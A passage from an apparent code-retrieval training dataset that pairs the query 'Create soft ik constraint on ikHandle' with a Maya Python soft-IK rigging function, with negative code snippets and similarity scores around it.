'ai_curve_shaderg', 'ai_curve_shaderb')\n for ar in arnold_nodes:\n cmds.setAttr(shape + \".\" + ar, l=True, k=False, cb=False)", "def dynamic_vnic_conn_policy_create(handle, name, descr=None, dynamic_eth=\"54\",\n adaptor_profile_name=None,\n protection=\"protected\",\n parent_dn=\"org-root\", **kwargs):\n\n from ucscsdk.mometa.vnic.VnicDynamicConPolicy import VnicDynamicConPolicy\n\n obj = handle.query_dn(parent_dn)\n if not obj:\n raise UcscOperationError(\"dynamic_vnic_conn_policy_create\",\n \"Org %s does not exist\" % parent_dn)\n\n mo = VnicDynamicConPolicy(parent_mo_or_dn=obj,\n name=name,\n descr=descr,\n dynamic_eth=dynamic_eth,\n protection=protection,\n adaptor_profile_name=adaptor_profile_name)\n\n mo.set_prop_multiple(**kwargs)\n\n handle.add_mo(mo, modify_present=True)\n handle.commit()\n return mo", "def __init__(self, kp, ki, kd, tolerance,\n saturation=None, max_integral=None, integral_fade=1.0):\n super().__init__()\n self.tolerance = tolerance\n self.controller = pidController(kp, ki, kd, saturation=saturation,\n max_integral=max_integral, integral_fade_rate=integral_fade)", "def connect_hooks():\n\n mc.refresh()\n\n if not mc.objExists('world_CTL'):\n return\n\n # Constrain ll hooks\n hook_node_attrs = mc.ls('*_'+utils.get_suffix('hook')+'.hookDriver')\n att_node_attrs = mc.ls('*_'+utils.get_suffix('attrDriver')+'.attrDriver')\n world_hook = mc.ls('*_worldRoot_*.allCtrlsVis')[0].split('.')[0]\n\n for attr in hook_node_attrs:\n print 'Connecting: '+attr\n\n driver = mc.ls(mc.getAttr(attr) or '')\n hook = attr.split('.')[0]\n\n if mc.getAttr(attr) and not driver:\n print ' \\t***Cannot find driver for : '+attr\n\n if not 
driver:\n continue\n\n # remove any contraints\n utils.set_attrs(hook, 't r s', k=1, l=0)\n cons = utils.get_constraints(hook)\n if cons:\n mc.delete(cons)\n\n # create new contraints on HOOK\n if mc.objExists(hook+'.connectXforms'):\n mc.connectAttr(driver[0]+'.t', hook+'.t')\n mc.connectAttr(driver[0]+'.r', hook+'.r')\n mc.connectAttr(driver[0]+'.s', hook+'.s')\n\n else:\n constraint.constraint_mtx(driver[0], hook)\n #mc.parentConstraint(driver[0], hook, mo=1)\n #mc.scaleConstraint(driver[0], hook, mo=1)\n\n # connect vis attrs to world nod\n hook_parents = utils.get_children('parts_'+utils.get_suffix('transform'))\n world_node = mc.ls('world_CTL')\n vis_node = mc.ls('visibility_CTL')\n\n utils.set_attrs(world_node[0], 'worldScale', l=1, k=0)\n\n attrs = ['allCtrlsVis', 'offsetCtrlsVis', 'jointsVis', 'jointsSelectable']\n\n if hook_parents and world_node:\n for hook_parent in hook_parents:\n for attr in attrs:\n mc.connectAttr(vis_node[0]+'.'+attr, hook_parent+'.'+attr)\n\n # recreate any attrs from hook nodes onto driver nodes\n driven_hooks = [a.split('.')[0] for a in hook_node_attrs+att_node_attrs]\n hook_drivers = [mc.getAttr(a) or '' for a in hook_node_attrs+att_node_attrs]\n ignore = ['isRequired', 'hookDriver', 'worldScale']\n\n for i, hook in enumerate(driven_hooks):\n driver = hook_drivers[i]\n\n if mc.objExists(hook):\n\n # copy attrs from original leg ctrl to new foot ctrl\n data = udAttributes.get_data(hook)\n if not data:\n continue\n\n if 'worldScale' in data[hook]['data'].keys():\n del data[hook]['data']['worldScale']\n\n if 'worldScale' in data[hook]['attr_order']:\n data[hook]['attr_order'].remove('worldScale')\n\n data[driver] = data[hook]\n if hook != driver:\n del data[hook]\n\n udAttributes.set_data(data, verbose=False)\n\n #drive ik leg ctrl attrs with foot ctrl\n attrs = data[driver]['attr_order']\n for attr in attrs:\n if attr not in ignore:\n try:\n mc.connectAttr(driver+'.'+attr, hook+'.'+attr)\n except:\n pass\n\n utils.break_connections('C_worldRoot_GRP', 'allCtrlsVis')\n utils.set_attrs(hook_parents, l=1, k=1)\n\n #hide no transforms\n mc.hide(mc.ls('noXform_'+utils.get_suffix('transform')))" ]
[ "0.6865341", "0.670034", "0.6326762", "0.61733705", "0.6086193", "0.59026164", "0.57446015", "0.55481964", "0.540773", "0.5367092", "0.53659767", "0.51581305", "0.5066359", "0.493914", "0.48905978", "0.48687443", "0.48397043", "0.48023486", "0.47860128", "0.47808054", "0.4765842", "0.46816355", "0.4661322", "0.46589276", "0.46124357", "0.46079683", "0.4583597", "0.45763084", "0.4567212", "0.45632422", "0.45630243", "0.45546556", "0.45453438", "0.45427397", "0.4539293", "0.45008367", "0.4490997", "0.44881424", "0.4480169", "0.44777772", "0.44704214", "0.44599462", "0.44580975", "0.4443421", "0.4429649", "0.442954", "0.4428362", "0.44178653", "0.44053847", "0.43785024", "0.437345", "0.4371689", "0.43679824", "0.43565726", "0.43428615", "0.43420208", "0.43385178", "0.4332224", "0.4329079", "0.43215856", "0.43199807", "0.4315735", "0.4312818", "0.4308805", "0.43085843", "0.43085843", "0.43005636", "0.42991948", "0.42884895", "0.42854974", "0.42789394", "0.42735273", "0.42726117", "0.42674124", "0.42621312", "0.42602003", "0.4259534", "0.42532563", "0.42526552", "0.4242296", "0.42335388", "0.42273423", "0.42273378", "0.4218153", "0.42178276", "0.42133966", "0.42076454", "0.41992366", "0.4195682", "0.4194209", "0.41904527", "0.41897443", "0.41856888", "0.41847914", "0.4184296", "0.41689628", "0.41679853", "0.41657144", "0.4164999", "0.41423982" ]
0.7807563
0
Create soft ik constraint on ikHandle.
def create_soft_ik(ik_ctrl, ik_joints, ik_handle):

    # get name and constant variables
    name = ik_handle+'Soft'
    parent = utils.get_parent(ik_joints[0])
    ik_handle_parent = utils.get_parent(ik_handle)

    # get total length of joint chain
    chain_length = 0
    for jnt in ik_joints[1:]:
        chain_length += abs(mc.getAttr(jnt+'.tx'))

    mc.addAttr(ik_joints[0], ln='softIkChainLength', k=1, dv=chain_length)

    # create dist node, (distance between top ik_joint and ik_handle) = X
    soft_ik_root = utils.snap_locator(ik_joints[0], node_type='transform')
    soft_ik_root = mc.rename(soft_ik_root, name+'_root_'+utils.get_suffix('transform'))

    dist = utils.create_distance_reader(soft_ik_root, ik_handle_parent)

    # create the dSoft and softIK attributes on the controller
    mc.addAttr(ik_ctrl, ln='softIK', min=0, k=1)
    ctrl_clamp = mc.createNode('clamp')
    mc.connectAttr(ik_ctrl+'.softIK', ctrl_clamp+'.inputR')
    mc.setAttr(ctrl_clamp+'.minR', 0.0001)
    mc.setAttr(ctrl_clamp+'.maxR', 10000000)

    # create node network for soft IK
    da_pma = mc.createNode('plusMinusAverage', n=name+'_da_pma')
    x_minus_da_pma = mc.createNode('plusMinusAverage', n=name+'_x_minus_da_pma')
    negate_x_minus_md = mc.createNode('multiplyDivide', n=name+'_negate_x_minus_md')
    divBy_dSoft_md = mc.createNode('multiplyDivide', n=name+'_divBy_dSoft_md')
    pow_e_md = mc.createNode('multiplyDivide', n=name+'_pow_e_md')
    one_minus_pow_e_pma = mc.createNode('plusMinusAverage', n=name+'_one_minus_pow_e_pma')
    times_dSoft_md = mc.createNode('multiplyDivide', n=name+'_times_dSoft_md')
    plus_da_pma = mc.createNode('plusMinusAverage', n=name+'_plus_da_pma')
    da_cond = mc.createNode('condition', n=name+'_da_cond')
    dist_diff_pma = mc.createNode('plusMinusAverage', n=name+'_dist_diff_pma')
    defaultPos_pma = mc.createNode('plusMinusAverage', n=name+'_defaultPos_pma')

    # set operations
    mc.setAttr(da_pma+'.operation', 2)
    mc.setAttr(x_minus_da_pma+'.operation', 2)
    mc.setAttr(negate_x_minus_md+'.operation', 1)
    mc.setAttr(divBy_dSoft_md+'.operation', 2)
    mc.setAttr(pow_e_md+'.operation', 3)
    mc.setAttr(one_minus_pow_e_pma+'.operation', 2)
    mc.setAttr(times_dSoft_md+'.operation', 1)
    mc.setAttr(plus_da_pma+'.operation', 1)
    mc.setAttr(da_cond+'.operation', 5)
    mc.setAttr(dist_diff_pma+'.operation', 2)
    mc.setAttr(defaultPos_pma+'.operation', 2)

    # make connections
    mc.connectAttr(ik_joints[0]+'.softIkChainLength', da_pma+'.input1D[0]')
    mc.connectAttr(ctrl_clamp+'.outputR', da_pma+'.input1D[1]')

    mc.connectAttr(dist+'.localDistance', x_minus_da_pma+'.input1D[0]')
    mc.connectAttr(da_pma+'.output1D', x_minus_da_pma+'.input1D[1]')

    mc.connectAttr(x_minus_da_pma+'.output1D', negate_x_minus_md+'.input1X')
    mc.setAttr(negate_x_minus_md+'.input2X', -1)

    mc.connectAttr(negate_x_minus_md+'.outputX', divBy_dSoft_md+'.input1X')
    mc.connectAttr(ctrl_clamp+'.outputR', divBy_dSoft_md+'.input2X')

    mc.setAttr(pow_e_md+'.input1X', 2.718281828)
    mc.connectAttr(divBy_dSoft_md+'.outputX', pow_e_md+'.input2X')

    mc.setAttr(one_minus_pow_e_pma+'.input1D[0]', 1)
    mc.connectAttr(pow_e_md+'.outputX', one_minus_pow_e_pma+'.input1D[1]')

    mc.connectAttr(one_minus_pow_e_pma+'.output1D', times_dSoft_md+'.input1X')
    mc.connectAttr(ctrl_clamp+'.outputR', times_dSoft_md+'.input2X')

    mc.connectAttr(times_dSoft_md+'.outputX', plus_da_pma+'.input1D[0]')
    mc.connectAttr(da_pma+'.output1D', plus_da_pma+'.input1D[1]')

    mc.connectAttr(da_pma+'.output1D', da_cond+'.firstTerm')
    mc.connectAttr(dist+'.localDistance', da_cond+'.secondTerm')
    mc.connectAttr(dist+'.localDistance', da_cond+'.colorIfFalseR')
    mc.connectAttr(plus_da_pma+'.output1D', da_cond+'.colorIfTrueR')

    mc.connectAttr(da_cond+'.outColorR', dist_diff_pma+'.input1D[0]')
    mc.connectAttr(dist+'.localDistance', dist_diff_pma+'.input1D[1]')

    mc.setAttr(defaultPos_pma+'.input1D[0]', 0)
    mc.connectAttr(dist_diff_pma+'.output1D', defaultPos_pma+'.input1D[1]')

    # Create new ik aim node
    up = [1, 0, 0]
    aim = [0, 1, 0]

    grp = mc.createNode('transform', n=name+'_soft_aim_'+utils.get_suffix('transform'), p=ik_handle_parent)
    gAim = mc.createNode('transform', n=name+'_soft_'+utils.get_suffix('transform'), p=grp)

    mc.aimConstraint(soft_ik_root, grp, aim=aim, u=up, wu=up, wut='objectRotation', wuo=ik_ctrl, n=grp+'_ac')

    mc.connectAttr(defaultPos_pma+'.output1D', gAim+'.ty')

    mc.pointConstraint(gAim, ik_handle)
    mc.parent(ik_handle, gAim)

    # parent stuff
    if parent:
        mc.parent(soft_ik_root, parent)

    return gAim
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def create_keep_in_constraint(self,der=2,limit=1e1,weight=1e5):\n print(\"Creating Keep in constraint\")\n constr = dict()\n constr['constraint_type'] = \"ellipsoid\"\n constr['weight'] = self.accel_weight\n constr['keep_out'] = False\n constr['der'] = der\n constr['x0'] = np.zeros(3)\n A = np.matrix(np.identity(3))\n limit = self.accel_lim\n A[0,0] = 1/limit**2\n A[1,1] = 1/limit**2\n A[2,2] = 1/limit**2\n constr['rot_mat'] = np.identity(3)\n constr['A'] = A\n\n\n self.qr_polytraj.add_constraint(constr['constraint_type'],constr,dynamic_weighting=False,sum_func=False)\n\n # self.qr_polytraj.run_astro()\n # self.update_path_markers()\n # acc_wp = self.get_accel_at_waypoints(\"main\")\n # self.interactive_marker_worker.make_controls(self.qr_polytraj.waypoints)\n # self.interactive_marker_worker.update_controls(self.qr_polytraj.waypoints,acc_wp = acc_wp)", "def create_fk_ik_switch(switch_ctrl, ik_handles, fk_ctrls, ik_ctrls, vis_ctrl=None, switch_attr_name='IK', vis_attr_name='fkIkCtrlVis'):\n\n fk_ctrls = mc.ls(fk_ctrls)\n ik_ctrls = mc.ls(ik_ctrls)\n ik_handles = mc.ls(ik_handles)\n\n if not vis_ctrl:\n vis_ctrl = switch_ctrl\n\n # Create attributes\n if not mc.objExists(switch_ctrl+'.'+switch_attr_name):\n mc.addAttr(switch_ctrl, ln=switch_attr_name, min=0, max=1, k=1)\n\n if not mc.objExists(vis_ctrl+'.'+vis_attr_name):\n mc.addAttr(vis_ctrl, ln=vis_attr_name, at='enum', en='auto:fkOnly:ikOnly:both', k=1)\n\n # Connect ik handles\n for handle in ik_handles:\n mc.connectAttr(switch_ctrl+'.'+switch_attr_name, handle+'.ikBlend')\n\n # Create swicth for ik ctrl\n ik_choice = utils.create_node('choice', n=vis_attr_name+'_ik_choice')\n mc.connectAttr(vis_ctrl+'.'+vis_attr_name, ik_choice+'.selector')\n mc.connectAttr(switch_ctrl+'.'+switch_attr_name, ik_choice+'.input[0]')\n mc.setAttr(ik_choice+'.input[1]', 0)\n mc.setAttr(ik_choice+'.input[2]', 1)\n mc.setAttr(ik_choice+'.input[3]', 1)\n\n for ctrl in ik_ctrls:\n mc.setAttr(ctrl+'.v', l=0)\n mc.connectAttr(ik_choice+'.output', ctrl+'.v', f=1)\n mc.setAttr(ctrl+'.v', l=1)\n\n # Create swicth for ik ctrl\n fk_choice = utils.create_node('choice', n=vis_attr_name+'_fk_choice')\n fk_rv = utils.create_node('reverse', n=vis_attr_name+'_fk_choice')\n mc.connectAttr(switch_ctrl+'.'+switch_attr_name, fk_rv+'.inputX')\n mc.connectAttr(vis_ctrl+'.'+vis_attr_name, fk_choice+'.selector')\n mc.connectAttr(fk_rv+'.outputX', fk_choice+'.input[0]')\n mc.setAttr(fk_choice+'.input[1]', 1)\n mc.setAttr(fk_choice+'.input[2]', 0)\n mc.setAttr(fk_choice+'.input[3]', 1)\n\n for ctrl in fk_ctrls:\n mc.setAttr(ctrl+'.v', l=0)\n mc.connectAttr(fk_choice+'.output', ctrl+'.v', f=1)\n mc.setAttr(ctrl+'.v', l=1)\n\n return True", "def createConstraint(self):\n return _libsbml.Model_createConstraint(self)", "def createConstraint(*argv):", "def _set_constraint(self):\n pass", "def _parse_initbound(self) :\n\t\tlogging.debug(\"Parsing initbound soft constraints\")", "def getCrossFormedGraphConstraintsPreventAnySwitch(self):\n makeLayer = self.makeLayer\n addNodeToLayer = self.addNodeToLayer\n eastWestEdgeFromTo = self.eastWestEdgeFromTo\n graph = self.graph\n setInLayerOrderConstraint = self.setInLayerOrderConstraint\n\n leftLayer = makeLayer(graph)\n rightLayer = makeLayer(graph)\n\n topLeft = addNodeToLayer(leftLayer)\n bottomLeft = addNodeToLayer(leftLayer)\n topRight = addNodeToLayer(rightLayer)\n bottomRight = addNodeToLayer(rightLayer)\n\n eastWestEdgeFromTo(topLeft, bottomRight)\n eastWestEdgeFromTo(bottomLeft, topRight)\n setInLayerOrderConstraint(topRight, 
bottomRight)\n setInLayerOrderConstraint(topLeft, bottomLeft)\n\n return graph", "def soft_constraint ( self , var , value , name = '' , title = '' ) :\n \n assert isinstance ( var , ROOT.RooAbsReal ) ,\\\n \"Invalid ``v'': %s/%s\" % ( var , type ( var ) ) \n assert isinstance ( value , VE ),\\\n \"Invalid ``value'': %s/%s\" % ( value , type ( value ) )\n\n assert 0 < value.cov2() , 'Invalid error for %s' % value\n \n name = name if name else 'Gauss_%s_%s' % ( var.GetName() , self.name ) \n title = title if title else 'Gaussian Constraint(%s,%s) at %s' % ( var.GetName() , self.name , value )\n \n # value & error as RooFit objects: \n val = ROOT.RooFit.RooConst ( value.value () )\n err = ROOT.RooFit.RooConst ( value.error () )\n \n # Gaussian constrains \n gauss = ROOT.RooGaussian ( self.var_name ( name ) , title , var , val , err )\n \n # keep all the created technical stuff \n self.aux_keep.append ( val )\n self.aux_keep.append ( err )\n self.aux_keep.append ( gauss )\n\n self.info ('Constraint is created %s=%s' % ( var.name , value ) )\n return gauss", "def _create_hardsigmoid(cls, op, op_t):\n node = cls._common_singa_tensor_to_onnx_node(op, op_t)\n\n node.attribute.extend([\n helper.make_attribute('alpha', op.alpha),\n helper.make_attribute('beta', op.gamma),\n ])\n return node", "def declare_physical_budget(model, k):\n\n m = model\n\n m.budget = pe.Constraint(expr=sum(1*m.delta_gen[g] for g in m.delta_gen.index_set()) +\\\n sum(1*m.delta_branch[k] for k in m.delta_branch.index_set()) +\\\n sum(1*m.delta_load[b] for b in m.delta_load.index_set()) +\\\n sum(1*m.delta_bus[b] for b in m.delta_bus.index_set()) == k)", "def test_create_hyperflex_auto_support_policy(self):\n pass", "def declare_physical_budget(model, k):\n\n m = model\n\n m.budget = pe.Constraint(expr=sum(5*m.delta_gen[g] for g in m.delta_gen.index_set()) +\\\n sum(1*m.delta_branch[k] for k in m.delta_branch.index_set()) +\\\n sum(3*m.delta_load[b] for b in m.delta_load.index_set()) +\\\n sum(1*m.delta_bus[b] for b in m.delta_bus.index_set()) == k)", "def _create_hardsigmoid(cls, onnx_node, inputs, opset_version):\n alpha = onnx_node.getattr(\"alpha\", 0.2)\n beta = onnx_node.getattr(\"beta\", 0.5)\n _, forward = cls._common_onnx_node_to_singa_op(onnx_node, inputs,\n opset_version)\n return _, forward(alpha, beta)", "def switch_to_ik(robot):\n\n target_ctrl_path = get_target_ctrl_path(robot)\n tool_ctrl_path = get_tool_ctrl_path(robot)\n fk_ctrls_path = format_path(__FK_CTRLS_PATH, robot)\n\n try:\n # Turn FK control visibility off\n pm.setAttr(fk_ctrls_path + '.v', 0)\n\n # Turn IK control visibility on\n pm.setAttr(target_ctrl_path + '.v', 1)\n pm.setAttr(format_path(__TARGET_CTRL_PATH + '|{1}target_CTRLShape',\n robot) + '.visibility', 1)\n\n if pm.objExists(tool_ctrl_path):\n pm.setAttr(tool_ctrl_path + '.v'.format(robot), 1)\n except:\n # These aren't crucial to the switch as they're just visual, and \n # a connection or locking of any of these attributes might throw\n # an error, so let's just skip it\n pass\n \n try:\n # Snap IK Ctrl to FK location\n _snap_ik_target_to_fk(robot)\n except:\n raise MimicError('Error swithching to IK; could not snap IK CTRL to FK')\n\n ## Find closest IK configuration to current FK pose ##\n # Get FK config and all IK solutions\n ik_sols = find_ik_solutions(robot)\n fk_config = find_fk_config(robot)\n\n # Remove all MFG-specific offsets from the FK config\n solver_params = get_solver_params(robot)\n axis_offsets = solver_params.axis_offsets\n rot_directions = 
solver_params.rot_directions\n fk_config_norm = _normalize_fk_pose(fk_config, axis_offsets, rot_directions)\n\n ## TO-DO: account for FK config rotations above and below 180 degrees\n # Select the closes IK configuration to the given FK config\n ik_config = find_closest_config(fk_config_norm, ik_sols)\n\n # Match IK config to FK pose\n pm.setAttr(target_ctrl_path + '.ikSolution1', ik_config[0])\n pm.setAttr(target_ctrl_path + '.ikSolution2', ik_config[1])\n pm.setAttr(target_ctrl_path + '.ikSolution3', ik_config[2])\n\n # turn ik solve back on\n pm.setAttr(target_ctrl_path + '.ik', 1)", "def createConstraint(schemaName, tableName, constraint):\n return constraints[constraint.kind](schemaName, tableName, constraint)", "def create_sticky(ctx, iface, resource_config, **_):\n\n # Create a copy of the resource config for clean manipulation.\n params = \\\n dict() if not resource_config else resource_config.copy()\n\n lb_name = params.get(LB_NAME)\n policy_name = params.get(RESOURCE_NAME)\n\n if not lb_name:\n targs = \\\n utils.find_rels_by_node_type(\n ctx.instance,\n LB_TYPE)\n lb_name = \\\n targs[0].target.instance.runtime_properties[\n EXTERNAL_RESOURCE_ID]\n params.update({LB_NAME: lb_name})\n\n ctx.instance.runtime_properties[LB_NAME] = \\\n lb_name\n ctx.instance.runtime_properties[RESOURCE_NAME] = \\\n policy_name\n\n # Actually create the resource\n iface.create_sticky(params)", "def ikHandle(*args, autoPriority: bool=True, connectEffector: bool=True, createCurve: bool=True,\n createRootAxis: bool=True, curve: Union[name, bool]=None, disableHandles:\n bool=True, enableHandles: bool=True, endEffector: Union[AnyStr, bool]=\"\", exists:\n AnyStr=\"\", forceSolver: bool=True, freezeJoints: bool=True, jointList: bool=True,\n name: Union[AnyStr, bool]=\"\", numSpans: int=0, parentCurve: bool=True,\n positionWeight: Union[float, bool]=0.0, priority: Union[int, bool]=0, rootOnCurve:\n bool=True, rootTwistMode: bool=True, setupForRPsolver: bool=True, simplifyCurve:\n bool=True, snapCurve: bool=True, snapHandleFlagToggle: bool=True,\n snapHandleToEffector: bool=True, solver: Union[AnyStr, bool]=\"\", startJoint:\n Union[AnyStr, bool]=\"\", sticky: Union[AnyStr, bool]=\"\", twistType: Union[AnyStr,\n bool]=\"\", weight: Union[float, bool]=0.0, q=True, query=True, e=True, edit=True,\n **kwargs)->Union[AnyStr, Any]:\n pass", "def convert_softshrink(g, op, block):\n\n x = g.get_node(op.input(\"X\")[0])\n dtype = infer_type(x).checked_type.dtype\n threshold = _expr.const(op.attr(\"lambda\"), dtype=dtype)\n zeros = _op.zeros_like(x)\n out = _op.where(x < -threshold, x + threshold, zeros) + _op.where(\n x > threshold, x - threshold, zeros\n )\n g.add_node(op.output(\"Out\")[0], out)", "def constraints(self, x):\n pass", "def make_constraint(constraint):\n if isinstance(constraint, str) and constraint == \"array-like\":\n return _ArrayLikes()\n if isinstance(constraint, str) and constraint == \"sparse matrix\":\n return _SparseMatrices()\n if isinstance(constraint, str) and constraint == \"random_state\":\n return _RandomStates()\n if constraint is callable:\n return _Callables()\n if constraint is None:\n return _NoneConstraint()\n if isinstance(constraint, type):\n return _InstancesOf(constraint)\n if isinstance(\n constraint, (Interval, StrOptions, Options, HasMethods, MissingValues)\n ):\n return constraint\n if isinstance(constraint, str) and constraint == \"boolean\":\n return _Booleans()\n if isinstance(constraint, str) and constraint == \"verbose\":\n return _VerboseHelper()\n if 
isinstance(constraint, str) and constraint == \"cv_object\":\n return _CVObjects()\n if isinstance(constraint, Hidden):\n constraint = make_constraint(constraint.constraint)\n constraint.hidden = True\n return constraint\n raise ValueError(f\"Unknown constraint type: {constraint}\")", "def spline_ik(self):\n ikHandle, ikEffector, ikCurve = pm.ikHandle(\n name=self.name + \"_ikh\",\n startJoint=self.joints[0],\n endEffector=self.joints[-1],\n solver='ikSplineSolver',\n simplifyCurve=False\n )\n\n # Get the number of digits so we can set the zfill correctly,\n digits = len(str(len(ikCurve.cv)))\n\n # Iterate over each cv and create a cluster deformer,\n for i, cv in enumerate(ikCurve.cv):\n cluster_node, cluster_handle = pm.cluster(cv)\n cluster_handle.rename(\n ikCurve.nodeName() + '_ch_{}'.format(str(i).zfill(digits))\n )", "def create_soft_block_at(self, x, y):\n cell_size = self.map.get_cell_size()\n obj = SoftBlock(\n parent=self.map,\n style={\n 'width': cell_size, \n 'height': cell_size * 2, \n 'z-index': layers['object'] }\n )\n # I am a soft block\n block(obj)\n # Randomly put an item after I dead\n make_breakable(self, obj, \n on_die=lambda: self.put_item_random(x, y))\n\n self.map.add_node(obj, x, y, 0, -cell_size)\n return obj", "def _constraints_external(self):\n pass", "def make_constraint ( self , var , value , name = '' , title = '' ) :\n \n ## create the gaussian constraint\n gauss = self.soft_constraint ( var , value , name , title ) \n \n cnts = ROOT.RooArgSet ( gauss )\n \n result = ROOT.RooFit.ExternalConstraints ( cnts )\n \n self.aux_keep.append ( cnts )\n \n return result", "def make_untrainable(circuit, weights_initialized):\n\n def circuit_var(weights):\n circuit(weights_initialized)\n\n return circuit_var", "def test_get_hyperflex_auto_support_policy_by_moid(self):\n pass", "def constraints(self):\n ...", "def constraint_level(self, soft_constraint):\n return soft_constraint.is_soft, len(soft_constraint.get_variables())", "def SetConstraint(self, model) :\n if 'pp' in self.__type : self.SetPPConstraint( model )\n elif self.__type == 'prBin' and self.bound!=0 : self.SetPRBinConstraint( model )\n elif self.__type == 'prCat' and self.bound != 0 : self.SetPRCatConstraint(model)\n elif self.__type == 'prBinCat' and self.bound != 0 : self.SetPRBinCatConstraint(model)\n elif self.bound == 0 : return\n else : raise RuntimeError( 'SetConstraint : Unknown type for Constraint : ', self.__type )", "def _set_restricted_policy(environ, bag):\n username = environ['tiddlyweb.usersign']['name']\n if username == 'GUEST':\n return\n bag.policy.owner = username\n # accept does not matter here\n for constraint in ['read', 'write', 'create', 'delete', 'manage']:\n setattr(bag.policy, constraint, [username])\n return", "def _create_softmax(cls, op, op_t):\n node = cls._common_singa_tensor_to_onnx_node(op, op_t)\n\n node.attribute.extend([\n helper.make_attribute('axis', op.axis),\n ])\n return node", "def add_constraint_sig(self, constraint_sig):\n self.constraint_sigs.append(constraint_sig)", "def declare_budget(model, k, relays):\n m = model\n\n m.budget = pe.Constraint(expr=sum(m.delta[r] for r in relays) <= k)", "def declare_budget(model, k, relays):\n m = model\n\n m.budget = pe.Constraint(expr=sum(m.delta[r] for r in relays) <= k)", "def weak_repulsion_boundary(Cents,a,k, CV_matrix,n_c,n_C):\n CCW = np.dstack((roll_reverse(Cents[:,:,0]),roll_reverse(Cents[:,:,1])))#np.column_stack((Cents[:,1:3],Cents[:,0].reshape(-1,1,2)))\n CCW_displacement = Cents - CCW\n rij = 
np.sqrt(CCW_displacement[:,:,0]**2 + CCW_displacement[:,:,1]**2)\n norm_disp = (CCW_displacement.T/rij.T).T\n V_soft_mag = -k*(rij - 2*a)*(rij<2*a)\n V_soft_CCW = (V_soft_mag.T*norm_disp.T).T\n V_soft_CW = -(roll_forward(V_soft_mag).T*norm_disp.T).T\n V_soft = V_soft_CW + V_soft_CCW\n F_soft = np.zeros((n_c, 2))\n for i in range(3):\n F_soft += np.asfortranarray(CV_matrix[:, :, i])@np.asfortranarray(V_soft[:, i])\n F_soft[n_C:] = 0\n return F_soft", "def constraint_for(dist=None, param=None):\n\n constraints = {\n 'atol':\n tfb.Softplus(),\n 'rtol':\n tfb.Softplus(),\n 'concentration':\n tfb.Softplus(),\n 'GeneralizedPareto.concentration': # Permits +ve and -ve concentrations.\n lambda x: tf.math.tanh(x) * 0.24,\n 'concentration0':\n tfb.Softplus(),\n 'concentration1':\n tfb.Softplus(),\n 'df':\n tfb.Softplus(),\n 'InverseGaussian.loc':\n tfb.Softplus(),\n 'JohnsonSU.tailweight':\n tfb.Softplus(),\n 'PowerSpherical.mean_direction':\n lambda x: tf.math.l2_normalize(tf.math.sigmoid(x) + 1e-6, -1),\n 'ContinuousBernoulli.probs':\n tfb.Sigmoid(),\n 'Geometric.logits': # TODO(b/128410109): re-enable down to -50\n # Capping at 15. so that probability is less than 1, and entropy is\n # defined. b/147394924\n lambda x: tf.minimum(tf.maximum(x, -16.), 15.\n ), # works around the bug\n 'Geometric.probs':\n constrain_between_eps_and_one_minus_eps(),\n 'Binomial.probs':\n tfb.Sigmoid(),\n 'NegativeBinomial.probs':\n tfb.Sigmoid(),\n 'Bernoulli.probs':\n tfb.Sigmoid(),\n 'PlackettLuce.scores':\n tfb.Softplus(),\n 'ProbitBernoulli.probs':\n tfb.Sigmoid(),\n 'RelaxedBernoulli.probs':\n tfb.Sigmoid(),\n 'cutpoints': # Permit values that aren't too large\n lambda x: tfb.Ascending().forward(10. * tf.math.tanh(x)),\n 'log_rate':\n lambda x: tf.maximum(x, -16.),\n 'mixing_concentration':\n tfb.Softplus(),\n 'mixing_rate':\n tfb.Softplus(),\n 'rate':\n tfb.Softplus(),\n 'scale':\n tfb.Softplus(),\n 'scale_diag':\n tfb.Softplus(),\n 'scale_identity_multiplier':\n tfb.Softplus(),\n 'tailweight':\n tfb.Softplus(),\n 'temperature':\n tfb.Softplus(),\n 'total_count':\n lambda x: tf.floor(tfb.Sigmoid()(x / 100.) * 100.) + 1.,\n 'Bernoulli':\n lambda d: dict(d, dtype=tf.float32),\n 'CholeskyLKJ':\n fix_lkj,\n 'LKJ':\n fix_lkj,\n 'Zipf':\n lambda d: dict(d, dtype=tf.float32),\n 'GeneralizedNormal.power':\n tfb.Softplus(),\n }\n\n if param is not None:\n return constraints.get('{}.{}'.format(dist, param),\n constraints.get(param, tfb.Identity()))\n return constraints.get(dist, tfb.Identity())", "def __init__(self, weight, n_bits, initial_treg_factor=1e-3, solver=\"SCS\"):\n\n self.exactly_zero = bool(weight == n_bits)\n self.n_bits = n_bits\n self.n = int(2**n_bits)\n self.weight = weight\n self.dim = n_parameters(weight, n_bits)\n self.solver = solver\n self.initial_treg_factor = initial_treg_factor\n self.warning_msg = None\n\n # Hold values *separate* from cvxpy variables as we sometimes need to revert\n # cvxpy optimizations which actually move values in a way that gives a *worse*\n # objective function.\n self.t_params = _np.zeros(self.dim)\n\n # cvxpy parameters\n self.P = _cp.Parameter(shape=(self.n,), nonneg=True, value=_np.zeros(self.n))\n self.Q = _cp.Parameter(shape=(self.n,), nonneg=True, value=_np.zeros(self.n))\n\n if weight == 0: return # special case; nothing more needed\n\n # Initialze a regularization factor to keep the optimizer from putting large elements\n # in T that move weight between near-zero elements of both p and q. 
We might need\n # to adjust this later, so make it a parameter.\n self.Treg_factor = _cp.Parameter(nonneg=True, value=self.initial_treg_factor)\n\n # Build the basis and the constrain matrix - the basis used to construct the T vector\n self.t_basis, self.cons = build_basis(self.weight, self.n_bits)\n\n self._build_problem()", "def __basis0(self, xi):\n return np.where(np.all([self.knot_vector[:-1] <= xi,\n xi < self.knot_vector[1:]], axis=0), 1.0, 0.0)", "def create_ik_setup(controls, joints):\n\n # Create control offset transforms\n exp_tf_ms = []\n for ctl in controls:\n par = cmds.listRelatives(ctl, parent=True)\n buf = create_offset_transform(ctl, BUF)\n exp = create_offset_transform(ctl, EXP)\n off = create_offset_transform(ctl, OFF)\n cmds.parent(ctl, off)\n cmds.parent(off, exp)\n cmds.parent(exp, buf)\n if par:\n cmds.parent(buf, par[0])\n exp_tf_ms.append(buf)\n\n root_control, pole_control, goal_control = controls\n handle, effector = cmds.ikHandle(sj=joints[0], ee=joints[-1], sol='ikRPsolver')\n cmds.setAttr('{}.hiddenInOutliner'.format(handle), True)\n cmds.orientConstraint(goal_control, joints[-1], mo=True)\n cmds.parent(handle, goal_control)\n cmds.hide(handle)\n\n # Connect root control to ik joint offset group\n ik_joints_offset = cmds.listRelatives(joints[0], p=True)[0]\n cmds.parentConstraint(root_control, ik_joints_offset, mo=True)\n 